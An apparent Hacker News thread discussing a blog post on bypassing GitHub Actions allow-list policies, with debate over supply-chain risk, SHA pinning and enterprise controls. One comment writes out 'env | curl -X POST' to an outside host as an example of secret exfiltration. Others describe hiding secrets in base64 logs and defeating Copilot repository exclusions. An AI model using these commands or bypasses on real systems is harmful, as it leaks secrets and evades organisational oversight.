[HN Gopher] Bypassing GitHub Actions policies in the dumbest way...
___________________________________________________________________
Bypassing GitHub Actions policies in the dumbest way possible
Author : woodruffw
Score : 146 points
Date : 2025-06-11 14:15 UTC (8 hours ago)
(HTM) web link (blog.yossarian.net)
(TXT) w3m dump (blog.yossarian.net)
| hiatus wrote:
| That the policy can be "bypassed" by a code change doesn't seem
| so severe. If you are not reviewing changes to your CI/CD
| workflows all hope is lost. Your code could be exfiltrated,
| secrets stolen, and more.
| internobody wrote:
| It's not simply a matter of review; depending on your setup
| these bypasses could be run before anyone even has eyes on the
| changes if your CI is triggered on push or on PR creation.
| rawling wrote:
| But similarly, couldn't you just write harmful stuff straight
| into the action itself?
| mystifyingpoi wrote:
| You definitely could, but it is more nuanced than that. You
| really don't want to be seen doing `env | curl -X POST
| http://myserver.cn` in a company repository. But using a
| legitly named action doesn't look too suspicious.
| jadamson wrote:
| `pull_request_target` (which has access to secrets) runs in
| the context of the destination branch, so any malicious
| workflow would need to have already been committed.
|
| GitHub has a page on this:
|
| https://securitylab.github.com/resources/github-actions-
| prev...
| woodruffw wrote:
| The point of the post is that review is varied in practice: if
| you're a large organization you should be reviewing the code
| itself for changes, but I suspect many orgs aren't tracking
| every action (and every version of every action) introduced in
| CI/CD changes. That's what policies are useful for, and why
| bypasses are potentially dangerous.
|
| Or as an intuitive framing: if you can understand the value of
| branch protection and secret pushing policies for helping your
| junior engineers, the same holds for your CI/CD policies.
| hiatus wrote:
| The problem is not related to tracking every action or
| version in CI/CD changes. Right now, you can just curl a
| binary and run that. How is that any different from the
| exploit here? I guess people may have had a false sense of
| security if they had implemented those policies, but I would
| posit those people didn't really understand their CI/CD
| system if they thought those policies alone would prevent
| arbitrary code execution.
| woodruffw wrote:
| I think it's a difference in category; pulling random
| binaries from the Internet is obviously not good, but it's
| empirically mostly done in a pointwise manner. Actions on
| the other hand are pulled from a "marketplace", are subject
| to automatic bumps via things like Dependanbot and
| Renovate, can be silently rewritten thanks to tag
| mutability, etc.
|
| Clearly in an ideal world runners would be hermetic. But I
| think the presence of other sources of non-hermeticity
| doesn't justify a poorly implemented policy feature on
| GitHub's part.
| solumos wrote:
| "We only allow actions published by our organization and
| reusable workflows"
|
| and
|
| "We only allow actions published by our organization and
| reusable workflows OR ones that are manually downloaded from an
| outside source"
|
| are very very different policies
| hiatus wrote:
| But there is no policy preventing external downloads in
| general, is there? I can curl a random script from a
| malicious website, too.
| kj4ips wrote:
| This is a prime example of "If you make an unusable secure
| system, the users will turn it into an insecure usable one."
|
| If someone is actively subverting a control like this, it
| probably means that the control has morphed from a guardrail into
| a log across the tracks.
|
| Somewhat in the same vein as AppLocker &co. Almost everyone says
| you should be using it, but almost no-one does, because it takes
| a massive amount of effort just to understand what "acceptable
| software" is across your entire org.
| solumos wrote:
| The implied fix to the "unusable secure system" is forking the
| checkout action to your org and referencing it there.
| hiatus wrote:
| That's not a fix though is it? Git tools are already on the
| runner. You could checkout code from public repos using cli,
| and you could hardcode a token into the workflow if you
| wanted to access a private repo (assuming the malicious
| internal user doesn't have admin privileges to add a secret).
| welshwelsh wrote:
| Nobody outside of the IT security bubble thinks that using
| AppLocker is a sensible idea.
|
| Companies have no business telling their employees which
| specific programs they can and cannot run to do their jobs,
| that's an absurd level of micromanagement.
| neilv wrote:
| > _Companies have no business telling their employees which
| specific programs they can and cannot run to do their jobs,
| that 's an absurd level of micromanagement._
|
| I'm usually on the side of empowering workers, but I believe
| sometimes the companies _do_ have business saying this.
|
| One reason is that much of the software industry has become a
| batpoop-insane slimefest of privacy (IP) invasion, as well as
| grossly negligent security.
|
| Another reason is that the company may be held liable for
| license terms of the software.
|
| Another reason is that the company may be held liable for
| illegal behavior of the software (e.g., if the software
| violates some IP of another party).
|
| Every piece of software might expose the company to these
| risks. And maybe disproportionately so, if software is being
| introduced by the "I'm gettin' it done!" employee, rather
| than by someone who sees vetting for the risks as part of
| their job.
| lelandbatey wrote:
| Developers are going to write code to do things for them,
| such as small utility programs for automating work. Each
| custom program is a potentially brand new binary, never
| sent before by the security auditing software. Does every
| program written by every dev have to be cleared? Is it best
| in such a system to get an interpreter cleared so I can use
| that to run whatever scripts I need?
| xmprt wrote:
| This is a strawman argument. If a developer writes code
| that does something malicious then it's on the developer.
| If they install a program then the accountability is a
| bit fuzzier. It's partly on the developer, partly on
| security (for allowing an unprivileged user to do
| malicious/dangerous things even unknowingly), and partly
| on IT (for allowing the unauthorized program to run
| without any verification).
| nradov wrote:
| That level of micromanagement can be quite sensible depending
| on the employee role. It's not needed for developers doing
| generic software work without any sensitive data. But if the
| employee is, let's say, a nurse doing medical chart review at
| an insurance company then there is absolutely no need for
| them to use anything other than specific approved programs.
| Allowing use of random software greatly increases the
| potential attack surface area, and in the worst case could
| result in something like a malware penetration and/or HIPAA
| privacy violation.
| bigfatkitten wrote:
| Anyone who's been sued by Oracle for not paying for Java SE
| runtime licences thinks it's an outstanding idea.
|
| https://itwire.com/guest-articles/guest-opinion/is-an-
| oracle...
|
| Security practitioners are big fans of application
| whitelisting for a reason: Your malware problems pretty much
| go away if malware cannot execute in the first place.
|
| The Australian Signals Directorate for example has
| recommended (and more recently, mandated) application
| whitelisting on government systems for the past 15 years or
| so, because it would've prevented the majority of intrusions
| they've investigated.
|
| https://nsarchive.gwu.edu/sites/default/files/documents/5014.
| ..
| throwaway889900 wrote:
| Not only can you yourself manually check out a specific repo, but
| if you have submodules and do a recursive checkout, it's also
| possible to pull in other security nightmares from places you
| never expected now. That would be one complicated attack to pull
| off though, chain of compromised workflows haha
| lmm wrote:
| Meh. Arbitrary code execution allows you to execute arbitrary
| code. If you curl | sh something in your github action script
| then that will "bypass the policy" too.
| ghusto wrote:
| > world's dumbest policy bypass: instead of doing uses:
| actions/checkout@v4, the user can git clone (or otherwise fetch)
| the actions/checkout repository into the runner's filesystem, and
| then use uses: ./path/to/checkout to run the very same action
|
| Good lord.
|
| This is akin to saying "Instead of doing `apt-get install
| <PACKAGE>`, one can bypass the apt policies by downloading the
| package and running `dpkg -i <PACKAGE>`.
| woodruffw wrote:
| I think a salient difference is that apt policies apply to apt,
| which GitHub goes to extents to document GitHub Actions
| policies as applying to `uses:` clauses writ large.
|
| (But also: in a structural sense, if a system _did_ have `apt`
| policies that were intended to prevent dependency introduction,
| then such a system _should_ prevent that kind of bypass. That
| doesn 't mean that the bypass is life-or-death, but it's a
| matter of hygiene and misuse prevention.)
| gawa wrote:
| > which GitHub goes to extents to document GitHub Actions
| policies as applying to `uses:` clauses
|
| If it were phrased like this then you would be right. The
| docs would give a false sense of security, would be
| misleading. So I went to check, but I didn't find such
| assertion in the linked docs (please let me know if I missed
| it) [0]
|
| So I agree with the commenter above (and Github) that
| "editing the github action to add steps to download a script
| and running" is not a fundamental flaw of this system
| designed to do exactly that, to run commands as instructed by
| the user.
|
| Overall we should always ask ourselves: what's the threat
| model here? If anyone can edit the Github Action, then we can
| make it do a lot of things, and this "Github Action Policy"
| filter toggle is the last of our worry. The only way to make
| the CI/CD pipeline secure (especially since the CD part
| usually have access to the outside world) is to prevent
| people from editing and running anything they want in it. It
| means preventing the access of users to the repository itself
| in the case off Github Actions.
|
| [0] https://blog.yossarian.net/2025/06/11/github-actions-
| policie...
| woodruffw wrote:
| That's from here[1].
|
| I suppose there's room for interpretation here, but I think
| an intuitive scan of "Allowing select actions and reusable
| workflows to run" is that the contrapositive ("not allowed
| actions and reusable workflows will not run") also holds.
| The trick in the post violates that contrapositive.
|
| I think people are really getting caught up on the code
| execution part of this, which is not really the point. The
| point is that a policy needs to be encompassing to have its
| intended effect, which in the case of GitHub Actions is
| presumably to allow large organizations/companies to
| inventory their CI/CD dependencies and make globally
| consistent, auditable decisions about them.
|
| Or in other words: the point here is similar to the reason
| companies run their own private NPM, PyPI, etc. indices --
| the point is not to stop the junior engineers from
| inserting shoddy dependencies, but to _know_ when they do
| so that remediation becomes a matter of policy, not "find
| everywhere we depend on this component." Bypassing that
| policy means that the worst of both worlds happens: you
| have the shoddy dependency _and_ the policy-view of the
| world doesn 't believe you do.
|
| [1]: https://docs.github.com/en/repositories/managing-your-
| reposi...
| qbane wrote:
| Also you can leak _any_ secrets by making connections to
| external services via internet and simply send secrets to them.
| formerly_proven wrote:
| Not in many enterprisey CI systems you can't, those
| frequently have hermetic build environments.
| msgodel wrote:
| Nothing makes me want to quit software more than
| enterprisey CI systems.
| qbane wrote:
| I think GitHub is correct that the bypass itself is not a
| vulnerability, but just like the little tooltip on GitHub's
| "create secret gist" button, GitHub can do a better job
| clarifying at the "Actions permissions" section.
| mystifyingpoi wrote:
| You can also print them to console in quadruple base64 in
| reverse, the trick is getting away with it.
| hk1337 wrote:
| This is why I avoid using non-official actions where possible and
| always set a version for the action.
|
| We had a contractor that used some random action to ssh files to
| the server and referenced master as the version to boot. First,
| ssh isn't that difficult to upload files and run commands but the
| action owner could easily add code to save private keys and
| information to another server.
|
| I am a bit confused on the "bypass" though. Wouldn't the
| adversary need push access to the repository to edit the workflow
| file? So, the portion that needs hardening is ensuring the wrong
| people do not have access to push files to the repository?
|
| On public repositories I could see this being an issue if they do
| it in a section of the workflow that is run when a PR is created.
| Private repositories, you should take care with who you give
| access.
| gawa wrote:
| > This is why I avoid using non-official actions where possible
| and always set a version for the action.
|
| Those are good practices. I would add that pinning the version
| (tag) is not enough, as we learnt with the tj-actions/changed-
| files event. We should pin the commit sha.[0]. Github states
| this in their official documentation [1] as well:
|
| > Pin actions to a full length commit SHA
|
| > Pin actions to a tag only if you trust the creator
|
| [0] https://www.stepsecurity.io/blog/harden-runner-detection-
| tj-...
|
| [1] https://docs.github.com/en/actions/security-for-github-
| actio...
| jand wrote:
| > I am a bit confused on the "bypass" though. Wouldn't the
| adversary need push access to the repository to edit the
| workflow file? So, the portion that needs hardening is ensuring
| the wrong people do not have access to push files to the
| repository?
|
| I understand it that way, too. But: Having company-wide
| policies in place (regarding actions) might be
| misunderstood/used as a security measure for the company
| against malicious/sloppy developers.
|
| So documenting or highlighting the behaviour helps the devops
| guys avoid a wrong sense of security. Not much more.
| monster_truck wrote:
| Had these exact same thoughts while I was configuring a series of
| workflows and scripts to get around the multiple unjustified and
| longstanding restrictions on what things are allowed to happen
| when.
|
| That sinking feeling when you search for how to do something and
| all of the top results are issues that were opened over a decade
| ago...
|
| It is especially painful trying to use github to do anything
| useful at all after being spoiled by working exclusively from a
| locally hosted gitlab instance. I gave up on trying to get things
| to cache correctly after a few attempts of following their
| documentation, it's not like I'm paying for it.
|
| Was also very surprised to see that the recommended/suggested
| default configuration that runs CodeQL had burned over 2600
| minutes of actions in just a day of light use, nearly doubling
| the total I had from weeks of sustained heavy utilization. Who's
| paying for that??
| Already__Taken wrote:
| I'm baffled you can't clone internal/private repos with
| anything other than a developer PAT. They have a UI to share
| access for workflows, let cloning use that...
| throwaway52176 wrote:
| I use GitHub apps for this, it's cumbersome but works.
| saghm wrote:
| It used 1.8 days of time to run for a single day? I'm less
| curious about who's paying for it than who's _using _ it on
| your repo, because I can't even imagine having an average of
| almost two people scanning a codebase every single minute of
| the day.
| heelix wrote:
| Not the OP, but a poorly behaving repo can turn and burn for
| six hours on every PR, rather than the handful of minutes one
| would expect. It happens - but usually that sort of thing
| should be spotted and fixed. More often then not, something
| is trying to pull artifacts and timing out rather than it
| being a giant monorepo.
| fkyoureadthedoc wrote:
| This doesn't seem like a big deal to be honest.
|
| My main problem with the policy and how it's implemented at my
| job is that the ones setting the policies aren't the ones
| impacted by them, and never consult people who are. Our security
| team tells our GitHub admin team that we can't use 3rd party
| actions.
|
| Our GitHub admin team says sure, sounds good. They don't care,
| because they don't use actions, and they in fact don't delivery
| anything at all. Security team also delivers nothing, so they
| don't care. Combined, these teams crowning achievement is buying
| GitHub Enterprise and moving it back and forth between cloud and
| on prem 3 times in the last 7 years.
|
| As a developer, I'll read the action I want to use, and if it
| looks good I just clone the code and upload it into our own
| org/repo. I'm already executing a million npm modules in the same
| context that do god knows what. If anyone complains, it's getting
| hit by the same static/dynamic analysis tools as the rest of the
| code and dependencies.
| mook wrote:
| It sounds like reading the code and forking it (therefore
| preventing malicious updates) totally satisfies the intent
| behind the policy, then.
|
| My company has a similar whitelist of actions, with a list of
| third-party actions that were evaluated and rejected. A lot of
| the rejected stuff seems to be some sort of helper to make a
| release, which pretty much has a blanket suggestion to use the
| `gh` CLI already on the runners.
| clysm wrote:
| I'm not seeing the security issue here. Arbitrary code execution
| leads to arbitrary code execution?
|
| Seems like policies are impossible to enforce in general on what
| can be executed, so the only recourse is to limit secret access.
|
| Is there a demonstration of this being able to access/steal
| secrets of some sort?
| dijksterhuis wrote:
| It's less of an "use this to do nasty shit to a bunch of
| unsuspecting victims" one, and more of a "people can get around
| your policies when you actually need policies that limit your
| users".
|
| 1. BigEnterpriseOrg central IT dept click the tick boxes to
| disable outside actions because <INSERT SECURITY FRAMEWORK>
| compliance requires not using external actions [0]
|
| 2. BigBrainedDeveloper wants to use ExternalAction, so uses the
| method documented in the post because they have a big brain
|
| 3. BigEnterpriseOrg is no longer compliant with <INSERT
| SECURITY FRAMEWORK> and, more importantly, the central IT dept
| have zero idea this is happening without continuously
| inspecting all the CI workflows for every team they support and
| signing off on all code changes [1]
|
| That's why someone else's point of "you're supposed to fork the
| action into your organisation" is a solution if disabling local
| `uses:` is added as an option in the tick boxes -- the central
| IT dept have visibility over what's being used and by whom if
| BigBrainedDeveloper can ask for ExternalAction to be forked
| into BigEnterpriseOrg GH organisation. Central IT dept's
| involvement is now just review the codebase, fork it, maintain
| updates.
|
| NOTE: This is not a panacea against _all_ things that go
| against <INSERT SECURITY FRAMEWORK> compliance (downloading
| external binaries etc). But it would be an easy gap getting
| closed.
|
| ----
|
| [0]: or something, i dunno, plenty of reasons enterprise IT
| depts do stuff that frustrates internal developers
|
| [1]: A sure-fire way to piss off every single one of your
| internal developers.
| mystifyingpoi wrote:
| > Seems like policies are impossible to enforce
|
| The author relates to exactly that: "ineffective policy
| mechanisms are worse than missing policy mechanisms, because
| they provide all of the feeling of security through compliance
| while actually incentivizing malicious forms of compliance."
|
| And I totally agree. It is so abundant. "Yes, we are in
| compliance with all the strong password requirements, strictly
| speaking there is one strong password for every single admin
| user for all services we use, but that's not in the checklist,
| right?"
| TheTaytay wrote:
| I don't understand the risk honestly.
|
| Anyone who can write code to the repo can already do anything in
| GitHub actions. This security measure was never designed to
| mitigate against a developer doing something malicious. Whether
| they clone another action into the repo or write custom scripts
| themselves, I don't see how GitHub's measures could protect
| against that.
| woodruffw wrote:
| A mitigation for this exact policy mechanism is included in the
| post.
|
| (The point is _not_ directly malicious introductions: it 's
| supply chain risk in the form of engineers introducing
| actions/reusable workflows that are themselves
| malleable/mutable/subject to risk. A policy that claims to do
| that should _in fact_ do it, or explicitly document its
| limitations.)
| x0x0 wrote:
| The risk is the same reason we don't allow any of our servers
| to make outgoing network connections except to a limited host
| lists. eg backend servers can talk to the gateway, queue /
| databases, and an approved list of domains for apis and nothing
| else.
|
| The same guard helps prevent accidents, not maliciousness, and
| security breaches. If code somehow gets onto our systems, but
| we prevent most outbound connections, exfiltrating is much
| harder.
|
| Yes, people do code review but stuff slips through. See eg
| Google switching one of their core libs that did mkdir with a
| shell to run mkdir -p (tada! every invocation better understand
| shell escaping rules). That made it through code review. People
| are imperfect; telling your network no outbound connections
| (except for this small list) is much closer to perfect.
| hk1337 wrote:
| I haven't tested this but the main risk that is possible is
| users creating PRs on public repositories with actions that run
| on pull request.
| SamuelAdams wrote:
| The risk is simple enough. GitHub Enterprise allows admins to
| configure a list of actions to allow or deny. Ideally these
| actions are published in the GitHub Marketplace.
|
| The idea is that the organization does not trust these third-
| parties, therefore they disable their access.
|
| However this solution bypasses those lists by cloning open-
| source actions directly into the runner. At that point it's
| just running code, no different from if the maintainers wrote a
| complex action themselves.
| bob1029 wrote:
| I feel like GitHub's CI/CD offering is too "all-in" now. Once we
| are at a point where the SCM tool is a superset of AWS circa
| 2010, we probably need to step back and consider alternatives.
|
| A more ideal approach could be to expose a simple rest API or
| webhook that allows for the repo owner to integrate external
| tooling that is better suited for the purpose of enforcing status
| checks.
|
| I would much rather write CI/CD tooling in something like python
| or C# than screw around with yaml files and weird shared
| libraries of actions. You can achieve something approximating
| this right now, but you would have to do it by way of GH Actions
| to some extent.
|
| PRs are hardly latency sensitive, so polling a REST API once
| every 60 seconds seems acceptable to me. This is essentially what
| we used to do with Jenkins, except we'd just poll the repo head
| instead of some weird API.
| korm wrote:
| GitHub has both webhooks and an extensive API. What you are
| describing is entirely doable, nothing really requires GitHub
| Actions as far as I know.
|
| Most people opt for it for convenience. There's a balance you
| can strike between all the yaml and shared actions, and running
| your own scripts.
| masklinn wrote:
| > A more ideal approach could be to expose a simple rest API or
| webhook that allows for the repo owner to integrate external
| tooling that is better suited for the purpose of enforcing
| status checks.
|
| That... has existed for years?
| https://docs.github.com/en/rest?apiVersion=2022-11-28
|
| That was the only thing available before github actions. That
| was also the only thing available if you wanted to implement
| the not rocket science principle before merge queues.
|
| It's hard to beat free tho, especially for OSS maintainership.
|
| And GHA gives you concurrency you'd have to maintain an
| orchestrator (or a completely bespoke solution), just create
| multiple jobs or workflow.
|
| And you don't need to deal with tokens to send statuses with.
| And you get all the logs and feedback in the git interface
| rather than having to BYO again. And you can actually have PRs
| marked as merged when you rebased or squashed them (a feature
| request which is now in middle school:
| https://github.com/isaacs/github/issues/2)
|
| > PRs are hardly latency sensitive, so polling a REST API once
| every 60 seconds seems acceptable to me.
|
| There is nothing to poll:
| https://docs.github.com/en/webhooks/types-of-webhooks
| sureglymop wrote:
| I don't understand GitHubs popularity in the first place... You
| have git as the interoperable version control "protocol" but
| then slap proprietary issue, PR, CI and project management
| features on top that one couldn't bring with when migrating
| away? At that stage what is even the point of it being built on
| git? Also, for all that is great about git, I don't think it's
| the best version control system we could have at all. I wish
| we'd do some serious wheel reinventing here.
| chelmzy wrote:
| Does anyone know how to query what actions have been imported
| from the Actions Marketplace (or anywhere) in Github enterprise?
| I've been lazily looking into this for a bit and can't find a
| straight answer.
| solatic wrote:
| If your Security folk are trying to draw up a wall around the
| enterprise (prevent using stuff not intentionally mirrored in)
| but there are no network controls - no IP address based
| firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS VPC
| Endpoint Policy or GCP VPC Service Controls) governing access to
| object storage and the like.... Quite frankly, the implementation
| is either immature or incompetent.
|
| If you work for an org with restrictive policy but not
| restrictive network controls, anyone at work could stand up a $5
| VPS and break the network control. Or a Raspberry Pi at home and
| DynDNS. Or a million others.
|
| Don't be stupid and think that a single security control means
| you don't need to do defense in depth.
| OptionOfT wrote:
| We forked the actions as a submodule, and then pointed the uses
| to that directory.
|
| That way we were still tracking the individual commits which we
| approved as a team.
|
| Now there is interesting dichotomy. On one hand PMs want us to
| leverage GitHub Actions to build out stuff more quickly using
| pre-built blocks, but on the other hand security has no capacity
| or interest to whitelist actions (not to mention that the
| whitelist list is limited to 100 actions as per the article).
|
| That said, even tagging GitHub actions with a sha256 isn't
| perfect for container actions as they can refer to a tag, and the
| contents of that tag can be changed:
| https://docs.github.com/en/actions/sharing-automations/creat...
|
| E.g. I publish an action with code like runs:
| using: 'docker' image: 'docker://optionoft/actions-
| tool:v3.0.0'
|
| You use the action, and pin it to the SHA of this commit.
|
| I get hacked, and a hacker publishes a new version of
| optionoft/actions-tool:v3.0.0
|
| You wouldn't even get a Dependabot update PR.
| opello wrote:
| Maybe there's a future Dependabot feature to create FYI issues
| when in use tags change?
| john-h-k wrote:
| There is no meaningful way to get around this. Ban them in
| `uses:` keys? Fine, they just put it in a bash script and run
| that. Etc etc. If it allows running arbitrary code, this will
| always exist
| zingababba wrote:
| Copilot repository exclusions is another funny control from
| GitHub. It gets the local repo context from the .git/config
| remote origin URL. Just comment that out and you can use copilot
| on an 'excluded' repo. Remove the comment to push your changes.
| Very much a paper control.
| gchamonlive wrote:
| I'm inclined to add https://github.com/marketplace/actions/sync-
| to-gitlab to all my repos in github, so that I can tap into the
| social value of GitHub's community and the technical value of
| GitLab's everything else.
| 0xbadcafebee wrote:
| You call it a security issue. I call it my only recourse when the
| god damn tyrannical GitHub Org admins lock it down so hard I
| can't do my job.
|
| (yes it is a security issue (as it defeats a security policy) but
| I hope it remains unfixed because it's a stupid policy)
| jamesblonde wrote:
| Run data integration pipelines with Github actions -
|
| https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...
|
| It's the easiest way for many startups to get people to try out
| your software for free.
___________________________________________________________________
(page generated 2025-06-11 23:00 UTC)